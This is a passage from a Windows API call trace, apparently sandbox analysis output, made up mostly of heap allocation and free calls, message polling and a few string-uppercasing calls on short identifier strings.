Size=0x10) returned 0x24aa9b0 [0161.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0161.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdfd0d) returned 0x3780020 [0161.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0161.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3780020 | out: hHeap=0x25c0000) returned 1 [0161.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.720] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0161.720] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0161.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0161.720] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0161.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0161.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0161.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0161.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdfd0d) returned 0x3780020 [0161.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0161.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0161.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0161.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0161.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0161.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdfd0d) returned 0x3dc0020 [0161.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0161.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0161.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0161.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0161.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0161.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0161.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0161.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.749] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0161.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0161.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0161.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.753] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.753] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.753] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.753] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.753] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.754] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.754] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.754] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.754] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.754] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.755] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.755] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.755] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.755] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.755] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.756] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.756] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.758] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0161.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.758] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, 